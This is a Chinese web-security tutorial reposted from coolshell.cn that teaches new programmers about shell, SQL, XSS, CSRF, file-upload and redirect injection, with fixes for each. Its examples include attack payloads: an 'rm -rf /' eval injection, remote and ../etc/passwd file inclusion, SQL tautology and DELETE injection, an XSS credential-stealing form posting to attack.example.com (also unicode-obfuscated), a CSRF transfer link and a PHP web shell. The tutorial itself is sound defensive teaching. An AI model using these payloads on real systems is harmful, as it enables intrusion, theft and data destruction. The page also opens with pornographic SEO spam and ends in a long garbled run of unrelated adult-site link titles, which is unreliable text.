精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

程序員疫苗:代碼注入

開發(fā) 前端 后端
很多程序上錯誤就 像人類世界的病毒一樣,我們應該給我們的新入行的程序員注射一些疫苗,就像給新生兒打疫苗一樣,希望程序員從入行時就對這些錯誤有抵抗力。

幾個月在我的微博上說過要建一個程 序員疫苗網站,希望大家一起來提交一些錯誤示例的代碼,來幫助我們新入行的程序員,不要讓我們的程序員一代又一代的再重復地犯一些錯誤。很多程序上錯誤就 像人類世界的病毒一樣,我們應該給我們的新入行的程序員注射一些疫苗,就像給新生兒打疫苗一樣,希望程序員從入行時就對這些錯誤有抵抗力。

我的那個疫苗網站正在建議中(不好意思拖了很久),不過,我可以先寫一些關于程序員疫苗性質的文章,也算是熱熱身。希望大家喜歡,先向大家介紹第一注疫苗——代碼注入。

Shell注入

我們先來看一段perl的代碼:

  1. use CGI qw(:standard); 
  2. $name = param('name'); 
  3. $nslookup = "/path/to/nslookup"
  4. print header; 
  5. if (open($fh, "$nslookup $name|")) { 
  6.     while (<$fh>) { 
  7.         print escapeHTML($_); 
  8.         print "<br>\n"
  9.     } 
  10.     close($fh); 

如果用戶輸入的參數(shù)是:

  1. coolshell.cn%20%3B%20/bin/ls%20-l 

那么,這段perl的程序就成了:

  1. /path/to/nslookup coolshell.cn ; /bin/ls -l 

我們再來看一段PHP的程序:

  1. $myvar = 'somevalue';  
  2. $x = $_GET['arg'];  
  3. eval('$myvar = ' . $x . ';');  

eval“的參數(shù)將會視同PHP處理,所以額外的命令可被添加。例如:如果”arg”如果被設成”10; system('rm -rf /')“,后面的”system('rm -rf /')“代碼將被運行,這等同在服務器上運行開發(fā)者意料外的程序。(關于rm -rf /,你懂的,可參看“一個空格引發(fā)的悲劇”)

再來看一個PHP的代碼

  1. $isadmin= false; 
  2. ... 
  3. ... 
  4. foreach ($_GET as $key => $value) { 
  5.   $$key = $value

如果攻擊者在查詢字符串中給定”isadmin=1″,那$isadmin將會被設為值 “1″,然后攻擊值就取得了網站應用的admin權限了。

再來看一個PHP的示例:

  1. $action = 'login'
  2.    if (__isset( $_GET['act'] ) ) 
  3.       $action = $_GET['act']; 
  4.    require$action . '.php' ); 

這個代碼相當危險,攻擊者有可能可以干這些事:

  • /test.php?act=http://evil/exploit - 注入遠程機器上有漏洞的文件。
  • /test.php?act=/home/www/bbs/upload/exploit - 從一個已經上載、叫做exploit.php文件運行其代碼。
  • /test.php?act=../../../../etc/passwd%00 - 讓攻擊者取得該UNIX系統(tǒng)目錄檢索下密碼文件的內容。一個使用空元字符以解除.php擴展名限制,允許訪問其他非 .php 結尾文件。 (PHP默認值”magic_quotes_gpc = On”可以終止這種攻擊)

這樣的示例有很多,只要你的程序有諸如:system()StartProcess()java.lang.Runtime.exec()System.Diagnostics.Process.Start()以及類似的應用程序接口,都是比較危險的,最好不要讓其中的字符串去拼裝用戶的輸入。

PHP提供escapeshellarg()escapeshellcmd()以在調用方法以前進行編碼。然而,實際上并不建議相信這些方法是安全的 。

SQL注入

SQL injection,是發(fā)生于應用程序之數(shù)據(jù)庫層的安全漏洞。簡而言之,是在輸入的字符串之中注入SQL指令,在設計不良的程序當中忽略了檢查,那么這些注入進去的指令就會被數(shù)據(jù)庫服務器誤認為是正常的SQL指令而運行,因此遭到破壞。

在應用程序中若有下列狀況,則可能應用程序正暴露在SQL Injection的高風險情況下:

  1. 在應用程序中使用字符串聯(lián)結方式組合SQL指令(如:引號沒有轉義)。
  2. 在應用程序鏈接數(shù)據(jù)庫時使用權限過大的帳戶(如:很多開發(fā)人員都喜歡用sa(最高權限的系統(tǒng)管理員帳戶)連接Microsoft SQL Server數(shù)據(jù)庫)。
  3. 在數(shù)據(jù)庫中開放了不必要但權力過大的功能(例如在Microsoft SQL Server數(shù)據(jù)庫中的xp_cmdshell延伸預存程序或是OLE Automation預存程序等)
  4. 過于信任用戶所輸入的數(shù)據(jù),未限制輸入的字符數(shù),以及未對用戶輸入的數(shù)據(jù)做潛在指令的檢查。

例程:

某個網站的登錄驗證的SQL查詢代碼為

  1. strSQL = "SELECT * FROM users 
  2. WHERE (name = '" + userName + "') and (pw = '"+ passWord +"');" 

用戶在登錄時惡意輸入如下的的用戶名和口令:

  1. userName = "' OR '1'='1";
  1. passWord = "' OR '1'='1"

也就是實際上運行的SQL命令會變成下面這樣的,因此導致無帳號密碼,也可登錄網站。

  1. strSQL = "SELECT * FROM users;" 

這還不算惡劣的,真正惡劣的是在你的語句后再加一個自己的語句,如:

  1. username= "' ; DELETE FROM users; --"

這樣一來,要么整個數(shù)據(jù)庫的表被人盜走,要么被數(shù)據(jù)庫被刪除。

所以SQL注入攻擊被俗稱為黑客的填空游戲。你是否還記得酷殼這篇文章里的SQL注入?

#p#

[[76168]]

當他們發(fā)現(xiàn)一個網站有SQL注入的時候,他們一般會干下面的事:

  • 盜取數(shù)據(jù)表中的數(shù)據(jù),例如個人機密數(shù)據(jù)(信用卡,身份證,手機號,通訊錄……),帳戶數(shù)據(jù),密碼等,獲得用戶的數(shù)據(jù)和信息后對這些用戶進行“社會工程學”活動(如:我前兩天在微信上親身經歷)。
  • 取得系統(tǒng)管理員權限(例如ALTER LOGIN sa WITH PASSWORD=’xxxxxx’)。
  • 在數(shù)據(jù)庫中的數(shù)據(jù)中插入一些HTML/JS代碼,有可能得以在網頁加入惡意鏈接以及XSS,這樣一來就讓訪問者被黑。
  • 經由數(shù)據(jù)庫服務器提供的操作系統(tǒng)支持,讓黑客得以修改或控制操作系統(tǒng)(例如:MS SQL Server的 xp_cmdshell “net stop iisadmin”可停止服務器的IIS服務)。甚至破壞硬盤數(shù)據(jù),癱瘓全系統(tǒng)(例如xp_cmdshell “FORMAT C:”)。

現(xiàn)在的黑客比較壞,癱瘓系統(tǒng)的事,他們干的越來越少,因為沒什么利益,他們希望通過獲取用戶的帳號信息后,轉而攻擊用戶別的帳號,如游戲帳號,網銀帳號,QQ帳號等等他們可以獲利的事情(這就是為什么我希望大家在不站點上使用不同的口令,甚至不同的用戶信息的原因)

如何避免

  • 在組合SQL字符串時,先針對所傳入的參數(shù)作字符轉義(如:將單引號字符取代為連續(xù)2個單引號字符)。如果使用PHP開發(fā)網頁程序的話,亦可打開PHP的Magic quote功能自動將所有的網頁傳入?yún)?shù),將單引號字符取代為連續(xù)2個單引號字符。如果可能應該過濾以下字符:分號“;”,兩個減號“–”,單引號“’”,注釋“/* … */”。(當然,因為注入攻擊一般用閉合的引號來玩,所以把引號轉義了應該就沒有什么問題了)
  • 更換危險字符。例如在PHP通過addslashes()函數(shù)保護SQL注入。
  • 限制用戶輸入的長度,限制用戶輸入的取值范圍。
  • 為當前應用建立權限比較小的數(shù)據(jù)庫用戶,這樣不會導致數(shù)據(jù)庫管理員丟失。
  • 把數(shù)據(jù)庫操作封裝成一個Service,對于敏感數(shù)據(jù),對于每個客戶端的IP,在一定時間內每次只返回一條記錄。這樣可以避免被拖庫。

跨網站腳本注 入

跨網站腳本Cross-site scripting,通常簡稱為XSS或跨站腳本或跨站腳本攻擊)是一種網站應用程序的安全漏洞攻擊,是代碼注入的一種。它通過巧妙的方法注入惡意指令代 碼到網頁,使用戶加載并執(zhí)行攻擊者惡意制造的網頁程序。這些惡意網頁程序通常是JavaScript,但實際上也可以包括 Java, VBScript, ActiveX, Flash 或者甚至是普通的HTML。攻擊成功后,攻擊者可能得到包括但不限于更高的權限(如執(zhí)行 一些操作)、私密網頁內容、會話和cookie等各種內容。

假如我們有這樣一段PHP的代碼:

  1. $username = $_GET['username']; 
  2. echo '<div> Welcome, ' . $username . '</div>'


么我們可以這樣來注入:

http://trustedSite.example.com/welcome.php?username=<Script Language=”Javascript”>alert(“You’ve been attacked!”);</Script>

甚至這樣:

http://trustedSite.example.com/welcome.php?username=<div id=”stealPassword”>Please Login:<form name=”input” action=”http://attack.example.com/stealPassword.php” method=”post”>Username: <input type=”text” name=”username” /><br/>Password: <input type=”password” name=”password” /><input type=”submit” value=”Login” /></form></div>

這會讓網頁顯示以下內容:

  1. <div class="header"> Welcome, 
  2.     <div id="stealPassword">Please Login: 
  3.         <form name="input" action="attack.example.com/stealPassword.php" method="post"> 
  4.             Username: <input type="text" name="username" /> 
  5.             <br/> 
  6.             Password: <input type="password" name="password" /> 
  7.             <input type="submit" value="Login" /> 
  8.         </form> 
  9.     </div> 
  10. </div> 

注入的代碼還有可能變種為如下這種更為隱蔽的方式(unicode碼):

#p#

trustedSite.example.com/welcome.php?username=<script+type=”text/javascript”>
document.write(‘\u003C\u0064\u0069\u0076\u0020\u0069\u0064\u003D\u0022\u0073
\u0074\u0065\u0061\u006C\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064
\u0022\u003E\u0050\u006C\u0065\u0061\u0073\u0065\u0020\u004C\u006F\u0067
\u0069\u006E\u003A\u003C\u0066\u006F\u0072\u006D\u0020\u006E\u0061\u006D
\u0065\u003D\u0022\u0069\u006E\u0070\u0075\u0074\u0022\u0020\u0061\u0063
\u0074\u0069\u006F\u006E\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F
\u002F\u0061\u0074\u0074\u0061\u0063\u006B\u002E\u0065\u0078\u0061\u006D
\u0070\u006C\u0065\u002E\u0063\u006F\u006D\u002F\u0073\u0074\u0065\u0061
\u006C\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u002E\u0070\u0068
\u0070\u0022\u0020\u006D\u0065\u0074\u0068\u006F\u0064\u003D\u0022\u0070
\u006F\u0073\u0074\u0022\u003E\u0055\u0073\u0065\u0072\u006E\u0061\u006D
\u0065\u003A\u0020\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079
\u0070\u0065\u003D\u0022\u0074\u0065\u0078\u0074\u0022\u0020\u006E\u0061
\u006D\u0065\u003D\u0022\u0075\u0073\u0065\u0072\u006E\u0061\u006D\u0065
\u0022\u0020\u002F\u003E\u003C\u0062\u0072\u002F\u003E\u0050\u0061\u0073
\u0073\u0077\u006F\u0072\u0064\u003A\u0020\u003C\u0069\u006E\u0070\u0075
\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0070\u0061\u0073\u0073
\u0077\u006F\u0072\u0064\u0022\u0020\u006E\u0061\u006D\u0065\u003D\u0022
\u0070\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u0022\u0020\u002F\u003E
\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079\u0070\u0065\u003D
\u0022\u0073\u0075\u0062\u006D\u0069\u0074\u0022\u0020\u0076\u0061\u006C
\u0075\u0065\u003D\u0022\u004C\u006F\u0067\u0069\u006E\u0022\u0020\u002F
\u003E\u003C\u002F\u0066\u006F\u0072\u006D\u003E\u003C\u002F\u0064\u0069\u0076\u003E\u000D’);</script>

XSS的攻擊主要是通過一段JS程序得用用戶已登錄的cookie去模擬用戶的操作(甚至偷用戶的cookie)。這個方式可以讓用戶在自己不知情的情況下操作了自己不期望的操作。如果是網站的管理員中招,還有可能導致后臺管理權限被盜。關于其中的一些細節(jié)可以參看《新浪微博的XSS攻擊》一文。XSS攻擊是程序員有一糊涂就很容易犯的錯誤,你還可以看看網上的《騰訊微博的XSS攻擊》。

XSS攻擊在論壇的用戶簽檔里面(使用img標簽)也發(fā)生過很多次,包括像一些使用bcode的網站,很有可能會被注入一些可以被瀏覽器用來執(zhí)行的代碼。包括CSS都有可能被注入javascript代碼。

不要以為XSS攻擊是我們的程序沒有寫好,有時候,我們會引用別人站點上的js文件,比如:放一個天氣預報的小Widget的js,或是一個流量監(jiān)控,或是一段廣告的js文件。你不知道這些東西是不是有問題,如果有惡意的話,這就是你自己主動注入攻擊代碼了。

另外,XSS攻擊有一部分是和瀏覽器有關的。比如,如下的一些例子,你可能從來都沒有想過吧?(更多的例子可以參看酷殼很早以前的這篇文章《瀏覽器HTML安全列表》

  1. <table background=”javascript:alert(1)”> 
  2.   
  3. <meta charset=”mac-farsi”>¼script¾alert(1)¼/script¾ 
  4.   
  5. <img src=”javascript:alert(1)”> 

XSS攻擊通常會引發(fā)CSRF攻擊。CSRF攻擊主要是通過在A站上設置B站點上的鏈接,通過使用用戶在B站點上的登錄且還沒有過期的 cookie,從而使得用戶的B站點被攻擊。(這得益于現(xiàn)在的多Tab頁的瀏覽器,大家都會同時打開并登錄很多的網站,而這些不同網站的頁面間的 cookie又是共享的)

于是,如果我在A站點內的某個貼子內注入這么一段代碼:

  1. <img src="http://bank.example.com/transfer?account=XXX&amount=1000000&for=haoel"> 

很有可能你就在訪問A站的這個貼子時,你的網銀可能向我轉了一些錢。

如何避免

要防止XSS攻擊,一般來說有下面幾種手段:

  • 嚴格限制用戶的輸入。最好不要讓用戶輸入帶標簽的內容。最好不要讓用戶使用一些所見即所得的HTML編輯器。
  • 嚴格過濾用戶的輸入。如:
    • PHP的htmlentities()或是htmlspecialchars()或是strip_tags()
    • Python的cgi.escape()
    • ASP的Server.HTMLEncode()
    • Node.js的node-validator。
    • Java的xssprotect。
  • 在一些關鍵功能,完全不能信任cookie,必需要用戶輸入口令。如:修改口令,支付,修改電子郵件,查看用戶的敏感信息等等。
  • 限制cookie的過期時間。
  • 對于CSRF攻擊,一是需要檢查http的reference header。二是不要使用GET方法來改變數(shù)據(jù),三是對于要提交的表單,后臺動態(tài)生成一個隨機的token,這個token是攻擊者很難偽造的。(對于token的生成,建議找一些成熟的lib庫)

另外,你可能覺得網站在處理用戶的表單提交就行了,其實不是,想一想那些Web Mail,我可以通過別的服務器向被攻擊用戶發(fā)送有JS代碼、圖片、Flash的郵件到你的郵箱,你打開一看,你就中招了。所以,WebMail一般都禁止顯示圖片和附件,這些都很危險,只有你完全了解來源的情況下才能打開。電子郵件的SMTP協(xié)議太差了,基本上無法校驗其它郵件服務器的可信度,我甚至可以自己建一個本機的郵件服務器,想用誰的郵件地址發(fā)信就用誰的郵件地址發(fā)信所以,我再次真誠地告訴大家,請用gmail郵箱。別再跟我說什么QQMail之類的好用了。

#p#

上傳文件

上傳文件是一個很危險的功能,尤其是你如果不校驗上傳文件的類型的話,你可能會中很多很多的招,這種攻擊相當狠。試想,如果用戶上傳給你一個PHP、ASP、JSP的文件,當有人訪問這個文件時,你的服務器會解釋執(zhí)行之,這就相當于他可以在你的服務器上執(zhí)行一段程序。這無疑是相當危險的。

舉個例子:

  1. <form action="upload_picture.php" method="post" enctype="multipart/form-data"> 
  2. 要上傳的文件: 
  3. <input type="file" name="filename"/> 
  4. <br/> 
  5. <input type="submit" name="submit" value="Submit"/> 
  6. </form> 

后臺上傳文件的PHP程序

  1. $target = "pictures/" . basename($_FILES['uploadedfile']['name']); 
  2. if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target)){ 
  3.     echo "圖片文件上傳成功"
  4. }else{</div> 
  5.     echo "圖片文件上傳失敗"

假如我上傳了一個PHP文件如下:

文件名malicious.php

  1. <?php 
  2. system($_GET['cmd']); 
  3. ?> 

那么,我就可以通過如下的URL訪問攻擊你的網站了:

  1. http://server.example.com/upload_dir/malicious.php?cmd=ls%20-l 

抵御這樣的攻擊有兩種手段:

1)限制上傳文件的文件擴展名。

2)千萬不要使用root或Administrator來運行你的Web應用。

URL跳轉

URL跳轉很有可能會成為攻擊利用的工具。

比如下面的PHP代碼:

  1. $redirect_url = $_GET['url']; 
  2. header("Location: " . $redirect_url); 

這樣的代碼可能很常見,比如當用戶在訪問你的網站某個頁觀的時候沒有權限,于是你的網站跳轉到登錄頁面,當然登錄完成后又跳轉回剛才他訪問的那個頁面。一般來說,我們都會在跳轉到登錄頁面時在URL里加上要被跳轉過去的網頁。于是會出現(xiàn)上述那樣的代碼。

于是我們就可以通過下面的URL,跳轉到一個惡意網站上,而那個網站上可能有一段CSRF的代碼在等著你,或是一個釣魚網站。

  1. http://bank.example.com/redirect?url=http://attacker.example.net 

這種攻擊具有的迷惑性在于,用戶看到的http://bank.example.com,以為是一個合法網站,于是就點了這個鏈接,結果通過這個合法網站,把用戶帶到了一個惡意網站,而這個惡意網站上可能把頁面做得跟這個合法網站一模一樣,你還以為訪問的是正確的地方,結果就被釣魚了

解決這個問題很簡單,你需要在你的后臺判斷一下傳過來的URL的域名是不是你自己的域名。

你可以看看Google和Baidu搜索引擎的鏈接跳轉,百度的跳轉鏈接是被加密過的,而Google的網站鏈接很長,里面有網站的明文,但是會有幾個加密過的參數(shù),如果你把那些參數(shù)移除掉,Google會顯示一個重定向的提醒頁面。(我個人覺得還是Google做得好)

原文鏈接:http://coolshell.cn/articles/8711.html

責任編輯:陳四芳 來源: 酷殼網
相關推薦

2009-09-27 09:39:19

2017-03-13 09:07:05

測定代碼基因

2010-08-11 09:51:28

Flex代碼

2017-10-20 13:28:50

2012-03-06 09:22:46

程序員

2013-08-20 09:33:59

程序員

2009-05-21 15:58:12

程序員工作經驗職場

2011-05-13 14:34:02

程序員

2019-05-15 09:59:24

程序員技能開發(fā)者

2009-12-28 09:42:14

程序員

2011-05-10 09:29:30

代碼重寫

2009-12-10 17:05:10

Visual Stud

2015-08-25 15:54:17

程序員代碼生成器

2020-12-28 14:20:24

程序員代碼開發(fā)者

2009-12-03 16:50:58

Visual Basi

2015-06-17 14:24:48

優(yōu)秀程序員整潔代碼

2021-05-18 15:17:52

印度疫苗疫情

2015-04-10 19:37:34

程序員

2022-03-16 11:10:19

程序員社區(qū)技術

2013-07-12 10:58:16

程序員
點贊
收藏

51CTO技術棧公眾號

在线免费a视频| 色婷婷av777| 黑人极品ⅴideos精品欧美棵| 国产成人三级在线观看| 欧美黑人国产人伦爽爽爽| 噜噜噜在线视频| 青青久久精品| 午夜视频久久久久久| 国产视频久久网| 91看片在线免费观看| 18+视频在线观看| 久久综合九色欧美综合狠狠 | 国产一区二区三区朝在线观看| 中文字幕一区三区| 久久久久久久久久久久久久久久av| 中文区中文字幕免费看| 激情久久久久久久| 亚洲一级片在线看| 国产亚洲精品成人a| 成人黄色免费观看| 欧美日韩国产中文精品字幕自在自线 | 啪啪小视频网站| japanese色系久久精品| 欧美这里有精品| 精品一区二区三区无码视频| 最新av网站在线观看| eeuss鲁片一区二区三区在线观看| 91精品国产综合久久久久久蜜臀| 四虎成人在线观看| 136国产福利精品导航网址| 日韩在线视频网| xxxxx在线观看| 精品福利一区| 91麻豆精品久久久久蜜臀| 午夜精品久久久内射近拍高清| 先锋成人av| 国产精品福利一区二区| 日韩av一级大片| 青青色在线视频| 国产成人一区二区精品非洲| 成人性生交大片免费看视频直播 | 欧美精品色综合| 国产三级三级三级看三级| gogo高清在线播放免费| 亚洲精品美腿丝袜| 日韩成人午夜影院| 操你啦在线视频| 中文字幕在线观看不卡视频| 一区二区免费电影| 自拍视频在线免费观看| 国产精品日产欧美久久久久| 日韩福利视频| 91xxx在线观看| 国产精品美女久久久久av爽李琼| 色婷婷精品国产一区二区三区| 国产福利在线视频| 国产精品美女视频| 五月天av影院| 99福利在线| 亚洲精品一二三| 中文字幕日韩精品无码内射| 日韩精品亚洲人成在线观看| 亚洲电影一区二区三区| 亚洲人成无码网站久久99热国产| 国产精品蜜芽在线观看| 午夜精品福利一区二区蜜股av| 免费视频爱爱太爽了| √天堂8资源中文在线| 精品高清一区二区三区| 国产福利视频在线播放| 写真福利精品福利在线观看| 欧美日韩视频在线观看一区二区三区| 欧美日韩中文不卡| 欧洲一区在线| 日韩福利视频在线观看| 亚洲理论片在线观看| 欧美大人香蕉在线| 欧美福利视频在线| 国产日产精品一区二区三区| 男女男精品视频| 亚洲综合中文字幕在线观看| 无码国产精品高潮久久99| 国产片一区二区| 综合网五月天| 视频在线不卡| 国产精品一区二区视频| 国产91精品入口17c| 亚洲色大成网站www| 国产清纯白嫩初高生在线观看91| 91免费视频黄| 亚洲美女炮图| 亚洲综合一二区| 精品视频一区二区在线| 欧美激情不卡| 亚洲电影免费观看高清| 自拍偷拍你懂的| 黄色精品免费| 国产精品欧美激情| 亚洲精品第五页| 久久精品免视看| 精品91一区二区三区| 97蜜桃久久| 欧美区视频在线观看| 国产精品无码一区二区三| 日韩在线视屏| 热久久这里只有| 午夜精品久久久久久久第一页按摩| 久久亚洲一区二区三区明星换脸| 日韩第一页在线观看| 亚洲午夜天堂| 精品捆绑美女sm三区 | 视频精品在线观看| 欧美黑人视频一区| 这里只有精品999| 99热国产精品| 亚洲五码在线观看视频| 91伊人久久| 日韩精品视频在线观看免费| 国产盗摄x88av| 另类人妖一区二区av| 激情视频一区二区| av免费在线免费| 欧美色图免费看| 亚洲av无码成人精品国产| 好看的av在线不卡观看| 91精品视频专区| 91caoporn在线| 在线免费不卡电影| 少妇按摩一区二区三区| 一区二区国产在线观看| 国产98在线|日韩| 操你啦视频在线| 91精品国产欧美一区二区| www久久久久久久| 欧美一级二区| 久久综合狠狠综合久久综青草| 无码国产色欲xxxx视频| 亚洲狼人国产精品| 激情文学亚洲色图| 99久久99热这里只有精品| 国产精品久久久av| 九一国产在线| 欧美在线综合视频| av片在线免费看| 久久99精品久久久久久动态图 | 最新中文字幕av| 丝袜脚交一区二区| 色综合久久88色综合天天提莫| 日韩电影免费观| 国产一区二区精品丝袜| 波多野结衣黄色网址| 欧美极品少妇xxxxⅹ高跟鞋| av在线无限看| 欧美gay男男猛男无套| 国产日韩换脸av一区在线观看| 福利成人在线观看| 欧美日韩高清一区二区不卡| 成人自拍小视频| 国产91丝袜在线18| 成人网站免费观看入口| 同性恋视频一区| 国产成人精品最新| 欧美边添边摸边做边爱免费| 欧美一区二区三区影视| 国产精品变态另类虐交| 久久综合中文字幕| 色综合手机在线| 99国产精品一区二区| 不卡一区二区三区视频| 波多野在线观看| 亚洲精品一区二三区不卡| 无码人妻黑人中文字幕| 中文字幕中文字幕一区| 欧美老女人bb| 免费亚洲网站| 在线观看精品视频| 9l视频自拍九色9l视频成人| 国产999在线| 黄色免费在线网站| 亚洲精品www久久久| 婷婷激情五月综合| 最新热久久免费视频| zjzjzjzjzj亚洲女人| 久久久久国产精品一区二区| 亚洲啪啪av| 成人搞黄视频| 国产精品欧美激情| ririsao久久精品一区| 亚洲男人av电影| 国产精品无码天天爽视频| 亚洲国产精品一区二区www| 受虐m奴xxx在线观看| 国产在线国偷精品产拍免费yy| 免费在线观看视频a| 第一会所sis001亚洲| 国产精品亚洲不卡a| 久久不卡日韩美女| 91av成人在线| www久久日com| 一区二区亚洲精品国产| 欧美熟妇乱码在线一区| 欧美无人高清视频在线观看| 成年人免费看毛片| 亚洲欧美日韩中文播放| 黄色a一级视频| 国产福利一区在线| 蜜桃免费在线视频| 香蕉亚洲视频| 成人免费a级片| 国产韩国精品一区二区三区| 欧美精品亚洲| 国产福利一区二区精品秒拍| 成人av资源在线播放| 日韩av福利| 欧美在线视频一区二区| 黄色成人在线网| 久久久精品网站| eeuss影院在线播放| 亚洲精品国产精品久久清纯直播 | 欧美性生活一级| 日韩免费在线播放| 中日韩脚交footjobhd| 欧美激情一区二区三级高清视频| 暖暖日本在线观看| 在线播放国产一区二区三区| 日本视频在线观看一区二区三区| 亚洲的天堂在线中文字幕| 超碰人人人人人人| 91精品福利在线一区二区三区 | 亚洲成人激情在线| 国产ts人妖调教重口男| 欧美久久婷婷综合色| 欧美性受xxx黑人xyx性爽| 日韩欧美一区视频| 你懂的国产在线| 欧美日韩国产精品专区| 日韩三级小视频| 性欧美疯狂xxxxbbbb| 国产在线拍揄自揄拍无码视频| 亚洲精品欧美在线| 精品国产精品国产精品| 亚洲精品中文字幕在线观看| 永久久久久久久| 樱桃视频在线观看一区| 欧美丰满艳妇bbwbbw| 亚洲美女淫视频| 免费一级肉体全黄毛片| 亚洲一区二区三区在线播放| 久久综合色综合| 天天色天天爱天天射综合| 999这里只有精品| 一本久久精品一区二区| 日本妇乱大交xxxxx| 欧美精品黑人性xxxx| h狠狠躁死你h高h| 精品福利视频一区二区三区| 日本黄色大片视频| 日韩电影在线观看永久视频免费网站| 暖暖视频在线免费观看| 在线看日韩av| caoporm免费视频在线| 久久久久久亚洲精品不卡| 丝袜诱惑一区二区| 国产精品第一页在线| 99精品视频在线免费播放 | 欧美熟女一区二区| 亚洲欧美成人一区二区在线电影| 国产在线色视频| 久久精品久久久久电影| 欧美aaaaaaa| 青草青草久热精品视频在线观看| 高清亚洲高清| 99久久一区三区四区免费| 欧美a级网站| 亚洲欧洲国产日韩精品| 亚洲欧美文学| 国产福利视频在线播放| 精品在线视频一区| 国产xxxx视频| 国产精品乱码一区二区三区软件| 免费人成在线观看| 91国产精品成人| 久草视频免费在线播放| 欧美日韩亚洲91| 国产精品无码久久av| 亚洲国产小视频| 色视频在线免费观看| 久久久久久一区二区三区| 欧洲一区二区三区精品| 亚洲综合社区网| 国产综合久久久| 成人短视频在线观看免费| 老鸭窝亚洲一区二区三区| 日本77777| 国产偷国产偷亚洲高清人白洁| 亚洲色婷婷一区二区三区| 色婷婷综合久色| 国产18精品乱码免费看| 少妇高潮久久77777| 男人的天堂免费在线视频| 91在线观看免费观看| 亚洲亚洲免费| 国产成人永久免费视频| 美女视频一区二区三区| 久久国产精品无码一级毛片| 亚洲卡通动漫在线| 亚洲视频中文字幕在线观看| 日韩av在线免费观看一区| av片哪里在线观看| 国产精品视频区| 婷婷亚洲精品| 久久成人福利视频| 国产一区二区三区四区五区入口| 国产三级av在线播放| 精品日本高清在线播放| 亚洲精品久久久久avwww潮水| 日韩在线观看免费网站| 三上悠亚一区二区| 国内精品一区二区| 激情欧美日韩一区| 午夜影院免费版| 国产精品入口麻豆原神| www.五月婷婷.com| 亚洲欧美另类国产| 涩涩av在线| 久久国产精品 国产精品| 亚洲特级毛片| 乱码一区二区三区| 一区二区三区视频在线看| 国产免费av电影| 久久九九国产精品怡红院| 成人午夜亚洲| 亚洲精品在线视频观看| 日韩精品成人一区二区三区| 白白色免费视频| 在线影视一区二区三区| 精品视频二区| 国产精品91久久久| 欧美老女人另类| 亚洲一区二区三区四区五区xx| 久久蜜桃一区二区| youjizz在线视频| 亚洲欧美日韩国产中文| 欧美成人黑人| 五月天国产一区| 久久成人免费电影| 亚洲精品久久久久久国| 欧美一区二区免费视频| 天堂av在线电影| 国产精品久久国产精品| 国产九九精品| 成人免费网站黄| 欧美日韩国产不卡| 宅男网站在线免费观看| 99国产超薄丝袜足j在线观看| 国内精品久久久久久久影视麻豆| 欧美激情 亚洲| 欧美日韩中文在线观看| 电影av在线| 91超碰在线免费观看| 亚洲日本国产| 四虎永久免费在线观看| 欧美日韩免费高清一区色橹橹| 国产激情在线观看| 精品国产_亚洲人成在线| 久久美女性网| 国产精品酒店视频| 日韩精品中文字幕一区| 粉嫩一区二区三区国产精品| 成人a在线观看| 黄色一区二区三区四区| 中文字幕在线观看的网站| 欧美亚洲综合网| 午夜羞羞小视频在线观看| 久久伊人一区| 国产在线播放一区| 国产又色又爽又黄的| 一区二区三区四区精品| 欧州一区二区三区| 37pao成人国产永久免费视频| 国产精品热久久久久夜色精品三区 | 久久久久久久高潮| 男人av资源站| 日韩精品福利网站| 亚洲精品乱码日韩| 欧美 日韩 亚洲 一区| 成人久久精品人妻一区二区三区| 色琪琪综合男人的天堂aⅴ视频| 亚洲国产欧美在线观看| 国产成人亚洲精品无码h在线| 中文字幕视频一区| 无码精品人妻一区二区| 91精品国产综合久久香蕉的用户体验 | 国产精品美女久久久久| 乱妇乱女熟妇熟女网站| 中文字幕亚洲不卡| 男生女生差差差的视频在线观看| 亚洲va久久久噜噜噜久久天堂| 亚洲欧美卡通另类91av| 青娱乐国产精品|